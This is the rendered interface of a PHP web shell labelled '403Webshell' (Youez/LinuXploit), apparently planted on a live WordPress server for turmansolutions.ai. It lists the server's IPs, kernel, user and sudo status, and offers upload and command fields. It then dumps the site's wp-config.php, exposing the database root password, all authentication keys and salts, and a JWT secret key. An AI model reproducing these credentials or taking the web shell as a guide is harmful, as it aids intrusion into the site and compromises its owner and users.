403Webshell
Server IP : 3.147.158.171  /  Your IP : 216.73.216.88
Web Server : Apache/2.4.67 (Amazon Linux) OpenSSL/3.5.5
System : Linux ip-172-31-2-178.us-east-2.compute.internal 6.1.172-216.329.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC Wed May 20 06:31:34 UTC 2026 x86_64
User : ec2-user ( 1000)
PHP Version : 8.4.21
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /tsai/repo/sites/tsai2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /tsai/repo/sites/tsai2//wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the website, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * Database settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
 *
 * @package WordPress
 */

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wp_tsai2' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '1@dolphin' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+
 * Authentication unique keys and salts.
 *
 * Change these to different unique phrases! You can generate these using
 * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
 *
 * You can change these at any point in time to invalidate all existing cookies.
 * This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         ']]l+fkE/D9NqgY`7,;):rbvFU`+p+Rsobi[ToCtpnL,}jW3wEvzS{F$fyx9BQ/0%' );
define( 'SECURE_AUTH_KEY',  'mGA1D%B|0/C{s~l)zWw+*W,Hg9?]XuuQ}t~df^Y^bVi~D7YC##F,M_Z-b]dd`PBD' );
define( 'LOGGED_IN_KEY',    'Guei+6<XH[?H&:&YzLL+1/u:zf- /8~o^o.JHBs_`GQXqCqsQBn+Df&@SKY.jg]n' );
define( 'NONCE_KEY',        'i?(|FI/><@- athA:h(Ero~eeal8Zocu|D[zmhR%|27roz$Z-RTB_/z]u<|S-C:U' );
define( 'AUTH_SALT',        'G]JS~G0MCWQrI!W-$UpN<LfEBCJMeT*u}%d&X3^/w|Dh&?le5khJDNwB$0Sj;;pw' );
define( 'SECURE_AUTH_SALT', '&SFJ^.Tp7/i0=;y|GS[ue-M:b8d@zP/KB9:*n>IO(l1]$N.oo=?NDRs>$pijJ?4h' );
define( 'LOGGED_IN_SALT',   '(_0i30c.N1kv/Ggbiqvq-Try(5~<oq[`0lnAd}r|5M+tF66O+d@L+f{@|g:1b+YA' );
define( 'NONCE_SALT',       '}Bo^^;Jv2Jcjy65/7H%:^snX6YA?F.(@Pg/aaO_Z%G`>tw~6xEG;DmvOjyP:](h%' );

/**#@-*/

/**
 * WordPress database table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 *
 * At the installation time, database tables are created with the specified prefix.
 * Changing this value after WordPress is installed will make your site think
 * it has not been installed.
 *
 * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
 */
define( 'WP_DEBUG', false );

/* Add any custom values between this line and the "stop editing" line. */


// jpt added
define('JWT_AUTH_SECRET_KEY', '89sdf6^&5fdss987bhvbc');
define('JWT_AUTH_CORS_ENABLE', true);

define( 'WP_HOME', 'https://turmansolutions.ai');
define( 'WP_SITEURL', 'https://turmansolutions.ai');

//define('WP_ENV', 'development'); // Change to 'production' when on the production server.
define('WP_ENV', 'production'); // Change to 'production' when on the production server.

// end jpt added


/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
	define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';

Youez - 2016 - github.com/yon3zu
LinuXploit